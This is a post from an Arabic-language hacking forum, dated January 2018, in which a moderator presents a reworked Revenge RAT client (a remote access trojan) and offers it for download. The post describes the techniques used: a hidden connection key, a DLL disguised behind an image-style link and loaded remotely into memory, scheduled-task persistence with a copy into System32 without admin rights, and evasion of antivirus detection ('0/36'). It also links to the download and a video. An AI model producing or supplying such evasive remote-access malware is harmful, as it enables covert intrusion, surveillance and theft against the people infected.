26.01.2018 New Revenge Rat Client Bypass Node + Clean


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,632
3,590
1
السلام عليكم
موضوع اليوم عن New Revenge Rat Client Bypass Node + Clean

قلت بحول
البروجيكت من الفيجوال بيزك للسي شارب
على طريقي قمت
باخفاء مفتاح الاتصال عن طريق موضوعي هنا وامور اخرى ثانية
Convert Any String To int as ASCII Table






وانا عمحوله قلت ليش مااخلي البروجيكت عبارة عن مكتبة مش ملف تنفيذي
واعمل invoke للمكتبة عن بعد "يعني المكتبة بتكون ب رابط بامتداد صورة مثلا"
استخدمت موضوعي هنا
قراءة المكتبة عن بعد بالذاكرة وتمرير البارامرتات اللازمة للفانكشن المستهدفة [Njrat Client Without Client on Hard Drive]
وايضا بالناتج
النهائي للملف التنفيذي استخدمت عدة مواضيع منها هذا
Call And Invoke Method [Methods]





وايضا الناتج النهائي فيه تثبيت بالمهام المجدولة مع النسخ لمسار بالسستم 32 بدون صلاحيات ادمن
تم التجريب على
نود وتم التخطي "بدون اشعار بتهديد بالذاكرة" ..
والناتج كلين
ReRa.exe | 0/36 | NoDistribute

لتحميل المكتبة من هنا والمشروع النهائي 8 كيلو بايت مع التثبيت بالمهام المجدولة من المرفقات
لتحميل الفديو من هنا
https://drive.google.com/file/d/1erLYbdBWrjfqNWARgCmt20F4aB0_msGJ/view?usp=sharing

 

المرفقات

التعديل الأخير بواسطة المشرف:
  • أعجبني
التفاعلات: KHALED DZ و issam.dasaadl

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك